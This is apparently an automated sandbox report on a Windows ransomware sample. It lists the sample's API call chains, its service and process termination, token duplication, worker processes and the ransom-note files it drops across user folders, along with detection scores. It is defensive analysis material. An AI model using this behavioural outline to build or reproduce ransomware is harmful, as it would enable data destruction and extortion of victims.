                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004054E0 CreateThread,WaitForSingleObject,NtTerminateThread,GetExitCodeThread,NtClose,1_2_004054E0
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401AE1 NtDuplicateToken,NtSetInformationThread,NtClose,1_2_00401AE1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004069E1 CreateIoCompletionPort,CreateThread,CreateThread,Sleep,PostQueuedCompletionStatus,PostQueuedCompletionStatus,WaitForMultipleObjects,NtClose,NtClose,1_2_004069E1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004039E3 SHGetSpecialFolderPathW,wcscat,wcslen,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RegCreateKeyExW,wcslen,RegSetValueExW,NtClose,wcscpy,wcscat,RtlFreeHeap,RegCreateKeyExW,wcslen,RegSetValueExW,NtClose,SHChangeNotify,1_2_004039E3
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00407784 RtlAllocateHeap,GetModuleFileNameW,RtlAllocateHeap,RtlAllocateHeap,wcslen,wcslen,RtlAllocateHeap,wcscat,wcscat,RtlFreeHeap,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00407784
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040318A memset,OpenWindowStationW,NtSetSecurityObject,OpenDesktopW,NtSetSecurityObject,CloseDesktop,CloseWindowStation,1_2_0040318A
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401C9B CreateFileW,WriteFile,NtClose,1_2_00401C9B
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004020A3 NtOpenProcessToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,NtClose,1_2_004020A3
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004055AB NtQueryObject,_wcsicmp,RtlFreeHeap,1_2_004055AB
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402FB6 NtQueryInformationProcess,1_2_00402FB6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004048B6 NtQuerySystemInformation,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_004048B6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00406EB7 GetModuleFileNameW,GetLogicalDriveStringsW,RtlAllocateHeap,GetLogicalDriveStringsW,RtlAllocateHeap,RtlAllocateHeap,GetDriveTypeW,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,WaitForMultipleObjects,MapViewOfFile,UnmapViewOfFile,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00406EB7
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004033B9 CreateFontW,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,memset,SelectObject,SHGetSpecialFolderPathW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,NtClose,wcscat,RegCreateKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,NtClose,NtClose,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,1_2_004033B9
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004054BB NtQueryInformationFile,1_2_004054BB
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004027BC RegisterServiceCtrlHandlerW,SetServiceStatus,NtOpenProcessToken,NtDuplicateToken,NtSetInformationToken,memset,memset,CreateProcessAsUserW,NtClose,NtClose,NtClose,NtClose,SetServiceStatus,1_2_004027BC
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402742 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,1_2_00402742
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00406C06 wcslen,wcslen,RtlAllocateHeap,wcschr,_swprintf,memset,memset,CreateProcessAsUserW,CreateProcessWithTokenW,CreateProcessW,_swprintf,CreateFileMappingW,ResumeThread,NtClose,RtlFreeHeap,1_2_00406C06
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402E441_2_00402E44
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00404A881_2_00404A88
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: P3FwQWmwUM.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: P3FwQWmwUM.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal92.rans.evad.winEXE@19/47@0/1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00407D8B GetLogicalDriveStringsW,RtlAllocateHeap,GetLogicalDriveStringsW,RtlAllocateHeap,GetDriveTypeW,GetDiskFreeSpaceExW,_alldiv,_alldiv,_swprintf,wcslen,RtlReAllocateHeap,1_2_00407D8B
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_004026A6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004026A6 OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_004026A6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402A1F StartServiceCtrlDispatcherW,1_2_00402A1F
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeMutant created: \Sessions\1\BaseNamedObjects\Global\89f3671df4dda4177e202fbdb1910c9c
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5448:120:WilError_01
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: P3FwQWmwUM.exeVirustotal: Detection: 45%
                      Source: P3FwQWmwUM.exeReversingLabs: Detection: 62%
                      Source: unknownProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe 'C:\Users\user\Desktop\P3FwQWmwUM.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                      Source: P3FwQWmwUM.exeStatic PE information: certificate valid
                      Source: P3FwQWmwUM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401867 LoadLibraryA,GetProcAddress,1_2_00401867
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .text1
                      Source: P3FwQWmwUM.exeStatic PE information: real checksum: 0x1b03e should be: 0x1e38a
                      Source: P3FwQWmwUM.exeStatic PE information: section name: .text1
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.95739719557
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Desktop\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Documents\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Music\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Pictures\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Videos\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Downloads\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Favorites\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Links\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\WindowsApps\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Saved Games\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004026A6 OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_004026A6
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,memset,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,RtlFreeHeap,1_2_004046E2
                      Source: C:\Windows\System32\svchost.exe TID: 4048Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403EDD wcscat,FindFirstFileExW,wcsrchr,wcscpy,FindNextFileW,FindClose,1_2_00403EDD
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401B91 wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,FindNextFileW,FindClose,RtlFreeHeap,1_2_00401B91
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040409F wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscpy,GetFileAttributesW,RemoveDirectoryW,RtlFreeHeap,DeleteFileW,RtlFreeHeap,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_0040409F
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004066AC wcslen,RtlAllocateHeap,wcscpy,GetFileAttributesW,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscat,GetFileAttributesW,wcsstr,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_004066AC
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403FBA wcscpy,wcscat,FindFirstFileExW,wcscpy,wcscat,FindNextFileW,FindClose,1_2_00403FBA
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403E86 GetLogicalDriveStringsW,GetDriveTypeW,1_2_00403E86
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: svchost.exe, 00000006.00000002.511001882.0000020C762EF000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 00000006.00000002.520513505.0000020C77654000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000008.00000002.509479778.0000016781202000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 00000008.00000002.510850863.0000016781240000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.511888178.000002AA91067000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.508453273.0000023E35A2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 0000000A.00000002.518469990.000002AA91D40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.325436632.000002E872540000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402367 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,wcscpy,wcscat,wcslen,RtlFreeHeap,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,1_2_00402367
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401867 LoadLibraryA,GetProcAddress,1_2_00401867
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402367 mov ebx, dword ptr fs:[00000030h]1_2_00402367
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004016D2 mov eax, dword ptr fs:[00000030h]1_2_004016D2
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040A288 mov ecx, dword ptr fs:[00000030h]1_2_0040A288
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004017AE mov eax, dword ptr fs:[00000030h]1_2_004017AE
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040221B wcscpy,wcschr,LogonUserW,wcslen,1_2_0040221B
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess created: C:\Users\user\Desktop\P3FwQWmwUM.exe C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\Jump to behavior
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: P3FwQWmwUM.exe, 00000003.00000002.510938998.0000000000D80000.00000002.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000002.513037161.0000000000CF0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.512991576.0000020B74790000.00000002.00000001.sdmp, notepad.exe, 00000016.00000002.513746818.0000019FB7120000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00407EFB GetUserNameW,RtlAllocateHeap,GetUserNameW,RtlFreeHeap,1_2_00407EFB
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: svchost.exe, 0000000E.00000002.511831387.00000229BCF02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeDirectory queried: C:\Documents and SettingsJump to behavior
